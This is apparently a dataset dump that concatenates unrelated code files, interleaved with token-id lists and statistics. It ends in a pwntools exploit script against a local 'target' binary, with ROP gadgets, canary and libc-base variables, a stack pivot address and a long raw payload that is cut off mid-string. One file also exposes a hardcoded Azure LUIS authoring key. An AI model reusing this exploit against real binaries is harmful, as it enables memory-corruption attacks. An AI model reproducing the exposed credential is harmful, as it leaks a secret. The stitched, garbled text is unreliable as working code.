198,
11748,
33918,
198,
11748,
28686,
198,
11748,
3108,
8019,
198,
11748,
25064,
198,
11748,
299,
32152,
355,
45941,
198,
198,
11748,
1275,
7058,
198,
11748,
182... | 2.44811 | 1,667 |
import unittest
from shmakovpn.extend_builtins import ExtendedDict
from functools import reduce
from typing import List, Dict, Any
class TestGroupByExtendedDict(unittest.TestCase):
"""
This class contains tests of **groupby** using **ExtendedDict**
"""
data: List[Dict[str, Any]] = [
{'name': 'alex', 'score': 2, },
{'name': 'john', 'score': 4, },
{'name': 'dan', 'score': 1, },
{'name': 'alex', 'score': 6, },
{'name': 'dan', 'score': 3, },
]
"""the dataset for tests"""
def test_group_by_extended_dict(self):
"""
Test for **groupby** that uses **ExtendedDict**
"""
self.assertEqual(
reduce(
lambda a, b: a.return_updated(
**{b['name']: a.pop(b['name'], []) + [b['score']]}
),
self.data,
ExtendedDict(), # use **ExtendedDict** as an accumulator
), {
'john': [4],
'alex': [2, 6],
'dan': [1, 3],
}
)
| [
11748,
555,
715,
395,
201,
198,
6738,
427,
76,
44715,
21999,
13,
2302,
437,
62,
18780,
1040,
1330,
24204,
35,
713,
201,
198,
6738,
1257,
310,
10141,
1330,
4646,
201,
198,
6738,
19720,
1330,
7343,
11,
360,
713,
11,
4377,
201,
198,
20... | 1.861436 | 599 |
{
'variables': {
'project_name': 'examples',
'current_dir': '<(DEPTH)',
},
'targets': [
{
'target_name': 'basic_sample',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_sample.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'basic_render',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_render.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'simple_texture',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'simple_texture.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
],
}
| [
90,
198,
220,
705,
25641,
2977,
10354,
1391,
198,
220,
220,
220,
705,
16302,
62,
3672,
10354,
705,
1069,
12629,
3256,
198,
220,
220,
220,
705,
14421,
62,
15908,
10354,
705,
27,
7,
46162,
4221,
8,
3256,
198,
220,
8964,
198,
220,
705,... | 1.815686 | 510 |
from azure.cognitiveservices.language.luis.authoring import LUISAuthoringClient
from msrest.authentication import CognitiveServicesCredentials
import datetime, json, os, time
authoring_key = "bde233f61f5e4e3fa48ff5a11b0f304c"
region = "westus"
endpoint = "https://{}.api.cognitive.microsoft.com".format(region)
# Instatiating a LUIS client
client = LUISAuthoringClient(endpoint, CognitiveServicesCredentials(authoring_key))
| [
198,
6738,
35560,
495,
13,
66,
2360,
20288,
712,
1063,
13,
16129,
13,
2290,
271,
13,
9800,
278,
1330,
50168,
1797,
13838,
278,
11792,
198,
6738,
13845,
2118,
13,
41299,
3299,
1330,
38655,
31007,
34,
445,
14817,
198,
198,
11748,
4818,
... | 2.972789 | 147 |
# Copyright 2020 Silicon Compiler Authors. All Rights Reserved.
import siliconcompiler
import pytest
@pytest.fixture
##################################
def test_minimum(chip):
'''API test for min/max() methods
'''
flow = chip.get('option', 'flow')
N = len(chip.getkeys('flowgraph', flow , 'syn'))
chip.write_flowgraph('minmax.png')
chip.write_manifest('minmax.json')
steplist = []
for i in range(N):
steplist.append(('syn',str(i)))
(score, winner) = chip.minimum(*steplist)
assert winner[0] + winner[1] == 'syn9'
| [
2,
15069,
12131,
18210,
3082,
5329,
46665,
13,
1439,
6923,
33876,
13,
198,
11748,
29867,
5589,
5329,
198,
11748,
12972,
9288,
198,
198,
31,
9078,
9288,
13,
69,
9602,
198,
198,
29113,
2235,
198,
4299,
1332,
62,
39504,
7,
35902,
2599,
1... | 2.703349 | 209 |
import torch.utils.data as ut
import torch
import cPickle as cp
import numpy as np
from utils import Progbar, getdata
from model import Word2vec
from torch.autograd import Variable
import torch.optim as optim
from constants import *
use_cuda = torch.cuda.is_available()
data = filter(lambda x: len(x) > 1, open(TEXT).read().split(' '))
word2ix = cp.load(open(VOCAB_FILE))
unigram_table = np.load(UNIGRAM_TABLE_FILE)
data = filter(lambda x: x in word2ix, data)
syn_set = {}
ant_set = {}
with open(PPDB_SYN_FILE) as f:
for line in f:
line = line.strip().split(' ')
syn_set = add2dict(line[0], line[1], syn_set, word2ix)
with open(PPDB_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
with open(WORDNET_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
# Convert the sets to lists
syn_set = {w: list(syn_set[w]) for w in syn_set}
ant_set = {w: list(ant_set[w]) for w in ant_set}
def generate_data(data, word2ix, window_size):
"""
Takes in a sequence of words, and returns the indexed data, a list of (word, [2 * window])
:param data: sequence of words
:param word2ix: dictionary mapping words to indexes
:param window_size: Lenght of window
:return indexed_data: List of (word_ix, [2 * window])
"""
indexed_data = []
for ix in xrange(window_size, len(data) - window_size):
word_ix = word2ix[data[ix]]
window = [word2ix[w] for w in data[ix - window_size: ix]] + [word2ix[w] for w in data[ix + 1: ix + window_size + 1]]
indexed_data.append((word_ix, window))
return indexed_data
window = 4
neg_samples = 25
n_syn = 4
n_ant = 4
indexed_data = generate_data(data, word2ix, window)
iterator = DataIterator(unigram_table, indexed_data, neg_samples, syn_set, ant_set, n_syn, n_ant)
BATCH_SIZE = 128
dataloader = ut.DataLoader(iterator, batch_size=BATCH_SIZE,
shuffle=True, num_workers=0)
N_EPOCHS = 5
# lr = 0.001
lr = 0.025
bar = Progbar(N_EPOCHS)
w2v = Word2vec(len(word2ix), 300, sparse=False)
optimizer = optim.Adagrad(w2v.parameters(), lr=lr)
words_processed = 0.
for epoch in xrange(N_EPOCHS):
n_batches = len(iterator) // BATCH_SIZE if len(iterator) % BATCH_SIZE == 0 else (len(iterator) // BATCH_SIZE) + 1
bar = Progbar(n_batches)
print "\nEpoch (%d/ %d)\n" % (epoch + 1, N_EPOCHS)
for ix, batch in enumerate(dataloader):
batch = map(lambda x: Variable(x), batch)
if use_cuda:
batch = map(lambda x: x.cuda(), batch)
loss, p_score, n_score, s_score, a_score = w2v(*batch)
loss.backward()
optimizer.step()
optimizer.zero_grad()
# Update the lr
words_processed += BATCH_SIZE
new_lr = lr * max(1e-4, 1. - (words_processed / (len(iterator) * N_EPOCHS)))
for param_groups in optimizer.param_groups:
param_groups['lr'] = new_lr
loss, p_score, n_score, s_score, a_score = map(lambda x: getdata(x).numpy()[0], [loss, p_score, n_score, s_score, a_score])
bar.update(ix + 1, values=[('l', loss), ('p', p_score), ('n', n_score), ('s', s_score), ('a', a_score), ('lr', new_lr)])
weights = w2v.embedding_i.weight
weights = weights.cpu() if use_cuda else weights
weights = weights.data.numpy()
save_file = BASE_DIR + "Models/vocab_matrix_with_syn_ant.npy"
np.save(save_file, weights)
| [
11748,
28034,
13,
26791,
13,
7890,
355,
3384,
198,
11748,
28034,
198,
11748,
269,
31686,
293,
355,
31396,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
3384,
4487,
1330,
1041,
70,
5657,
11,
651,
7890,
198,
6738,
2746,
1330,
9678,
17,
... | 2.305828 | 1,527 |
import LevelBuilder
from sprites import * | [
11748,
5684,
32875,
198,
6738,
42866,
1330,
1635
] | 5.125 | 8 |
from typing import Dict, List
import pickle
import numpy as np
def predict_song(neighbors: Dict[str, List[int]]) -> Dict[str, List[int]]:
"""predict the ranks of song ids for each hum given its retrieved song neighbors
The most importance job is choose the first place song
The rules are, given one hum query and its retrieved neighbors:
1. if in top 10, there is no song id that appear 2 times then the rank
follow the distance rank
2. if in top 10, there is a song that appear >= 3 times, it must be ranked first place
3. if in top 10, there are song ids that appear 2 times and their ranks < 5, it will be ranked first
4. if in top 10, there are more than one song id that appear >= 2 times,
choose the one that has rank sum smaller to be top 1, then the second rank is the next
the other positions will follow the distance rank given that it is not already in the ranked list.
"""
# first we only choose the first rank song
# assume song_ids are all ints
ranked_ = {}
for qname, nbs in neighbors.items():
chosen = []
# if one song appear more than 3 times in top 5, it must be the one
# if the nearest song is not ranked first by this rule, it must be ranked second
ids, counts = np.unique(nbs[:5], return_counts = True)
max_count = np.max(counts)
if max_count >=3:
idx = list(counts).index(max_count)
chosen.append(ids[idx])
if nbs[0] != chosen[0]:
chosen.append(nbs[0])
ranked_[qname] = chosen
continue
# if in top 5 there are *2* song_ids that both appear 2 times, then the one
# that on top 1 and appear 2 times will be the first, the one on top 2
# or larger and appear 2 times will be the second
ids, counts = np.unique(nbs[:5], return_counts = True)
max_count = np.max(counts)
if len(ids) == 3 and max_count == 2:
nearest_song = nbs[0]
idx_of_nearest_song = list(ids).index(nearest_song)
count_of_nearest_song = counts[idx_of_nearest_song]
if count_of_nearest_song == 2:
chosen.append(nearest_song)
for i, c in enumerate(counts):
if c == 2 and ids[i] not in chosen:
chosen.append(ids[i])
ranked_[qname] = chosen
continue
# if in top 5, there is *one* song_id that appear 2 times and one of that is
# top 1, then it must be the one
# if that song_id appear 2 times but not the nearest, then it still ranked
# top 1 but the second ranked is the nearest
ids, counts = np.unique(nbs[:5], return_counts = True)
if len(ids) == 4:
nearest_song_id = nbs[0]
idx_of_nearest_song = list(ids).index(nearest_song_id)
if counts[idx_of_nearest_song] == 2:
chosen.append(nearest_song_id)
ranked_[qname] = chosen
continue
elif counts[idx_of_nearest_song] == 1:
idx = list(counts).index(2)
song_id = ids[idx]
chosen.append(song_id)
chosen.append(nearest_song_id)
# if top 10 are 10 different songs, the just take those
ids, counts = np.unique(nbs[:10], return_counts = True)
if len(ids) == 10:
chosen = nbs[:10]
ranked_[qname] = list(chosen)
continue
# if in top 5, there are 5 different song ids, and there is one or more
# song_ids that also appear on top 10 and on top 5, then it will be the
# first rank, the second rank is the one that nearest(if the previous is
# not the nearest)
ids, counts = np.unique(nbs[:5], return_counts = True)
if len(ids) == 5: # also means max_count == 1
new_ids, new_counts = np.unique(nbs[5:10], return_counts = True)
for id in nbs[:5]:
if int(id) in new_ids:
chosen.append(id)
if len(chosen) == 0:
chosen = list(nbs[:10])
ranked_[qname] = chosen
continue
if chosen[0] != nbs[0]:
chosen.append(nbs[0])
ranked_[qname] = chosen
continue
if len(chosen) == 0:
ranked_[qname] = list(nbs[:10])
# now add the remaining neighbors to the rank list, follow the distance rank
for qname, ranks in ranked_.items():
if len(ranks) == 0:
print('ranks=0')
j = 0
while len(ranks) < 10 and j < len(neighbors[qname]):
if neighbors[qname][j] not in ranks:
ranks.append(neighbors[qname][j])
j+=1
while len(ranks) < 10:
ranks.append(0)
absences = set(neighbors.keys()) - set(ranked_.keys())
for qname in absences:
chosen = []
j = 0
while len(chosen) < 10 and j < len(neighbors[qname]):
if neighbors[qname][j] not in chosen:
chosen.append(neighbors[qname][j])
j +=1
while len(chosen) < 10:
chosen.append(0)
ranked_[qname] = chosen
return ranked_
if __name__ == '__main__':
neighbors = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\neighbors.pkl', 'rb'))
val_data = pickle.load(open(r'C:\Users\ASUS\Desktop\repositories\hum_to_find\crepe_freq\val_data.pkl', 'rb'))
print(len(neighbors))
for qname, nbs in neighbors.items():
neighbors[qname] = [int(x) for x in neighbors[qname]]
rs = predict_song(neighbors)
print(len(rs))
mrr = []
for key in rs.keys():
for tup in val_data:
if key == tup[2]:
if int(tup[0]) not in list(rs[key]):
mrr.append(0)
else:
idx = list(rs[key]).index(int(tup[0])) +1
mrr.append(1/idx)
print(np.mean(mrr)) | [
6738,
19720,
1330,
360,
713,
11,
7343,
201,
198,
11748,
2298,
293,
201,
198,
201,
198,
11748,
299,
32152,
355,
45941,
201,
198,
201,
198,
201,
198,
4299,
4331,
62,
34050,
7,
710,
394,
32289,
25,
360,
713,
58,
2536,
11,
7343,
58,
6... | 2.026529 | 3,091 |
def count_parameters(model, verbose=True):
"""Count number of parameters in PyTorch model,
References: https://discuss.pytorch.org/t/how-do-i-check-the-number-of-parameters-of-a-model/4325/7.
from utils.utils import count_parameters
count_parameters(model)
import sys
sys.exit(1)
"""
n_all = sum(p.numel() for p in model.parameters())
n_trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
if verbose:
print("Parameter Count: all {:,d}; trainable {:,d}".format(n_all, n_trainable))
return n_all, n_trainable
| [
4299,
954,
62,
17143,
7307,
7,
19849,
11,
15942,
577,
28,
17821,
2599,
198,
220,
220,
220,
37227,
12332,
1271,
286,
10007,
287,
9485,
15884,
354,
2746,
11,
198,
220,
220,
220,
31458,
25,
3740,
1378,
15410,
1046,
13,
9078,
13165,
354,
... | 2.502146 | 233 |
# -*- coding: utf-8; -*-
from httpolice import request, response
from httpolice.blackboard import Blackboard
from httpolice.known import st
def complaint_box(*args, **kwargs):
"""Create an empty exchange that only carries a single notice.
This is used (for example, in :mod:`httpolice.framing1`)
to report notices that do not correspond to any particular message.
"""
box = Exchange(None, [])
box.complain(*args, **kwargs)
return box
def check_exchange(exch):
"""Run all checks on the exchange `exch`, modifying it in place."""
expect_100 = False
if exch.request:
request.check_request(exch.request)
expect_100 = exch.request.headers.expect == u'100-continue'
response.check_responses(exch.responses)
for resp in exch.responses:
if resp.status == st.continue_:
expect_100 = False
if expect_100 and resp.status == st.switching_protocols:
resp.complain(1305)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
26,
532,
9,
12,
198,
198,
6738,
2638,
349,
501,
1330,
2581,
11,
2882,
198,
6738,
2638,
349,
501,
13,
13424,
3526,
1330,
2619,
3526,
198,
6738,
2638,
349,
501,
13,
4002,
1330,
336,
628,... | 2.697222 | 360 |
import urllib
import cv2
import numpy as np
import os
create_pos_n_neg() | [
11748,
2956,
297,
571,
198,
11748,
269,
85,
17,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28686,
628,
198,
17953,
62,
1930,
62,
77,
62,
12480,
3419
] | 2.642857 | 28 |
# Set creds and headers
era_user = '@@{era_creds.username}@@'
era_pass = '@@{era_creds.secret}@@'
headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}
# Get Software Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Software&name=@@{software_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "SOFTWARE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Software Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Compute Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Compute&name=@@{compute_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "COMPUTE_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Compute Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get Network Profile ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Network&name=@@{network_profile}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "NETWORK_PROF_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get Network Profile ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1)
# Get DB Parameter ID
url = "https://@@{era_ip}@@:8443/era/v0.8/profiles?type=Database_Parameter&name=@@{database_parameter}@@"
resp = urlreq(url, verb='GET', auth='BASIC', user=era_user, passwd=era_pass, headers=headers)
if resp.ok:
print "DB_PARAM_ID={0}".format(json.loads(resp.content)['id'])
else:
print "Get DB Parameter ID request failed", json.dumps(json.loads(resp.content), indent=4)
exit(1) | [
2,
5345,
2600,
82,
290,
24697,
198,
8607,
62,
7220,
796,
705,
12404,
90,
8607,
62,
66,
445,
82,
13,
29460,
92,
12404,
6,
198,
8607,
62,
6603,
796,
705,
12404,
90,
8607,
62,
66,
445,
82,
13,
21078,
92,
12404,
6,
198,
50145,
796,
... | 2.561972 | 710 |
## Shorty
## Copyright 2009 Joshua Roesslein
## See LICENSE
## @url short.to
| [
2235,
10073,
88,
198,
2235,
15069,
3717,
20700,
5564,
408,
33663,
198,
2235,
4091,
38559,
24290,
198,
198,
2235,
2488,
6371,
1790,
13,
1462,
628
] | 3.16 | 25 |
#!/usr/bin/env python
import subprocess
import requests
import json
import time
import logging
try:
from Queue import Queue
except:
from queue import Queue
from threading import Thread, RLock
_LOG = logging.getLogger(__name__)
_LOG.setLevel(logging.DEBUG)
_lh = logging.StreamHandler()
_lh.setFormatter(logging.Formatter("[%(asctime)s] %(filename)s (%(lineno)3d): %(levelname) 8s: %(message)s"))
_LOG.addHandler(_lh)
NUM_TESTS = 0
FAILED_TESTS = []
FRAC_FLOAT_DIFF_TOL = 0.001
#########################################################################################
# The following code for execution in a non-blocking thread is from pyraphyletic. If
# we moved it to peyotl, we could import it from there (at the cost of making)
# otcetera depend on peyot.
class JobQueue(Queue):
"""Thread-safe Queue that logs the addition of a job to debug"""
def put(self, item, block=None, timeout=None):
"""Logs `item` at the debug level then calls base-class put"""
_LOG.debug("%s queued" % str(item))
Queue.put(self, item, block=block, timeout=timeout)
_jobq = JobQueue()
def worker():
"""Infinite loop of getting jobs off of _jobq and performing them."""
while True:
job = _jobq.get()
_LOG.debug('"{}" started"'.format(job))
try:
job.start()
except:
_LOG.exception("Worker dying.")
else:
try:
job.get_results()
except:
_LOG.exception("Worker exception. Error in job.get_results")
_LOG.debug('"{}" completed'.format(job))
_jobq.task_done()
_WORKER_THREADS = []
def start_worker(num_workers):
"""Spawns worker threads such that at least `num_workers` threads will be
launched for processing jobs in the jobq.
The only way that you can get more than `num_workers` threads is if you
have previously called the function with a number > `num_workers`.
(worker threads are never killed).
"""
assert num_workers > 0, "A positive number must be passed as the number of worker threads"
num_currently_running = len(_WORKER_THREADS)
for i in range(num_currently_running, num_workers):
_LOG.debug("Launching Worker thread #%d" % i)
t = Thread(target=worker)
_WORKER_THREADS.append(t)
t.setDaemon(True)
t.start()
#########################################################################################
_verb_name_to_req_method = {"GET": requests.get,
"PUT": requests.put,
"POST": requests.post,
"DELETE": requests.delete,
"HEAD": requests.head,
"OPTIONS": requests.options,
}
API_HEADERS = {'content-type' : 'application/json',
'accept' : 'application/json',
}
#########################################################################################
PIDFILE_NAME = "pidfile.txt"
RUNNING_SERVER = None
SERVER_PORT = 1985 # global, set by CLI. Needed by server launch and threads
SERVER_OUT_ERR_FN = "test-server-stdouterr.txt"
FAILED_TESTS, ERRORED_TESTS = [], []
if __name__ == '__main__':
import argparse
import codecs
import sys
import os
parser = argparse.ArgumentParser(description="Runs the otc-tol-ws and tests described in method.json files")
parser.add_argument('--taxonomy-dir', required=True, help='Directory that is the parent of the taxonomy files')
parser.add_argument('--synthesis-parent', required=True, help='Directory that is the parent of synthesis directories (if there is more than one subdirectory, then there will be multiple trees served - that option is not well tested).')
parser.add_argument('--exe-dir', required=True, help='Directory that holds the otc-tol-ws executable and which will be the working directory of the server.')
parser.add_argument('--tests-parent', required=True, help='Directory. Each subdir that holds a "method.json" file will be interpreted as a test.')
parser.add_argument('--test-name', default=None, required=False, help='Name of a subdir of the tests-parent dir. If provided only that test will be run; otherwise all of the tests will be run.')
parser.add_argument('--server-port', default=1985, type=int, required=False, help='Port number for the server')
parser.add_argument('--server-threads', default=4, type=int, required=False, help='Number of threads for the server')
parser.add_argument('--test-threads', default=8, type=int, required=False, help='Number of threads launched for running tests.')
parser.add_argument('--secs-to-recheck-pid-file', default=0, type=int, required=False, help='If the pid file exists, the process will enter a loop sleeping and rechecking for this number of seconds.')
args = parser.parse_args()
if args.server_threads < 1 or args.test_threads < 1:
sys.exit("The number of threads must be positive.")
taxonomy_dir = args.taxonomy_dir
if not os.path.isdir(taxonomy_dir):
sys.exit('Taxonomy directory "{}" does not exist.\n'.format(taxonomy_dir))
synth_par_path = args.synthesis_parent
if not os.path.isdir(synth_par_path):
sys.exit('Synthetic tree parent directory "{}" does not exist.\n'.format(synth_par_path))
exe_dir = args.exe_dir
if not os.path.isdir(exe_dir):
sys.exit('Executable directory "{}" does not exist.\n'.format(exe_dir))
test_par = args.tests_parent
if not os.path.isdir(test_par):
sys.exit('Tests parent directory "{}" does not exist.\n'.format(test_par))
if args.test_name is not None:
e_dir_list = [args.test_name]
else:
e_dir_list = get_test_dirs_under(test_par)
e_dir_list.sort()
SERVER_PORT = args.server_port
# Get test paths
to_run = []
for e_subdir_name in e_dir_list:
e_path = os.path.join(test_par, e_subdir_name)
if not os.path.isdir(e_path):
sys.stderr.write("Skipping test {} due to missing dir {} \n".format(e_subdir_name, e_path))
continue
mfile = os.path.join(e_path, "method.json")
if not os.path.isfile(mfile):
sys.stderr.write("Skipping test {} due to missing file {}\n".format(e_subdir_name, mfile))
continue
to_run.append(e_path)
if not to_run:
sys.exit("No test were found!")
# Check that there are no PIDfiles in the way
pidfile_path = os.path.join(exe_dir, PIDFILE_NAME)
if os.path.exists(pidfile_path):
recheck = 0
checks_per_sec = 3
while recheck < checks_per_sec*args.secs_to_recheck_pid_file:
recheck += 1
time.sleep(1.0/checks_per_sec)
if not os.path.exists(pidfile_path):
break
if os.path.exists(pidfile_path):
sys.exit("{} is in the way!\n".format(pidfile_path))
# try launching otc-tol-ws and running the tests against it.
for i in range(2):
if launch_server(exe_dir=exe_dir,
taxonomy_dir=taxonomy_dir,
synth_par=synth_par_path,
server_threads=args.server_threads):
try:
num_passed, nf, ne = run_tests(test_par, to_run, args.test_threads)
finally:
kill_server(exe_dir)
NUM_TESTS = nf + ne + num_passed
assert nf == len(FAILED_TESTS)
assert ne == len(ERRORED_TESTS)
sys.stderr.write('Passed {p:d}/{t:d} tests.'.format(p=num_passed, t=NUM_TESTS))
if FAILED_TESTS:
sys.stderr.write(' Failed:\n {}\n'.format('\n '.join(FAILED_TESTS)))
if ERRORED_TESTS:
sys.stderr.write(' Errors in:\n {}\n'.format('\n '.join(ERRORED_TESTS)))
if nf + ne > 0:
sys.exit(nf + ne)
sys.stderr.write('SUCCESS\n')
sys.exit(0)
else:
time.sleep(1) # relaunch (most likely cause is the port not being freed from previous test)
_LOG.error("Server launch failed: ")
with open(os.path.join(exe_dir, SERVER_OUT_ERR_FN), 'r') as seo:
sys.stderr.write(seo.read())
sys.exit(-1)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
11748,
850,
14681,
198,
11748,
7007,
198,
11748,
33918,
198,
11748,
640,
198,
11748,
18931,
198,
28311,
25,
198,
220,
220,
220,
422,
4670,
518,
1330,
4670,
518,
198,
16341,
25,
198,
22... | 2.37543 | 3,492 |
from cassandra.cluster import Cluster
from cassandra.cqlengine import connection
from cassandra.cqlengine.management import sync_table
from coins import Coin
CQLENG_ALLOW_SCHEMA_MANAGEMENT='CQLENG_ALLOW_SCHEMA_MANAGEMENT'
cluster=Cluster()
connection.setup(['127.0.0.1'], "cassy", protocol_version=3)
class CoinPrice
a = Coin()
##Cassandra coin model syncs to default cassandra connection under cassy keyspace.
##row key for time series data https://academy.datastax.com/resources/getting-started-time-series-data-modeling
#row partitioning:
# In some cases, the amount of data gathered for a single device isn’t practical to fit onto a single row. Cassandra can store up to 2 billion columns per row, but if we’re storing data every millisecond you wouldn’t even get a month’s worth of data. The solution is to use a pattern called row partitioning by adding data to the row key to limit the amount of columns you get per device. Using data already available in the event, we can use the date portion of the timestamp and add that to the weather station id. This will give us a row per day, per weather station, and an easy way to find the data. (figure 2)
# day = datetime.date.today().strftime('%m-%d-%Y')
# name = "XRP"
# ticker="XRPUSD"
# pair="XRPUSD"
# icon_url="https://www.google.com"
# price="0.8934"
# price=0.8934
# btc_price=0.00001
# created_at=datetime.datetime.now()
# source = "binance"
# a = Coin.create(day=day, name=name, ticker=ticker, pair=pair, icon_url=icon_url, price=price, btc_price=btc_price, source="binance", created_at=created_at)
| [
6738,
30606,
15918,
13,
565,
5819,
1330,
38279,
198,
6738,
30606,
15918,
13,
66,
13976,
18392,
1330,
4637,
198,
6738,
30606,
15918,
13,
66,
13976,
18392,
13,
27604,
1330,
17510,
62,
11487,
198,
6738,
10796,
1330,
16312,
198,
34,
9711,
2... | 3.175758 | 495 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import *
from genestack_client import Application, FilesUtil, GenestackException, Metainfo
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
6738,
11593,
37443,
834,
1330,
7297,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
11593,
37443,... | 3.65625 | 96 |
#!/usr/bin/env python3
from pwn import *
context.update(arch = 'amd64', os = 'linux', log_level = 'info')
target = ELF('./target', checksec=False)
libc_2_24_so = ELF('./libc-2.24.so', checksec=False)
__libc_csu_init = 0x400840
__libc_csu_init_call_target = 0x400e48
__libc_csu_init_gadget1 = 0x400896
__libc_csu_init_gadget2 = 0x400880
canary = 0x0
libc_2_24_so_base = 0x0
pivot_dest = 0x601860
target_base = 0x0
target_leave_ret = 0x40074a
target_pop_rbp_ret = 0x400668
if __name__ == '__main__':
proc = process(['./ld-2.24.so', './target'], env={'LD_PRELOAD': './libc-2.24.so'})
payload = b'\x45\x76\x65\x72\x79\x74\x68\x69\x6e\x67\x20\x69\x6e\x74\x65\x6c\x6c\x69\x67\x65\x6e\x74\x20\x69\x73\x20\x73\x6f\x20\x62\x6f\x72\x69\x6e\x67\x2e\x6e\x57\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e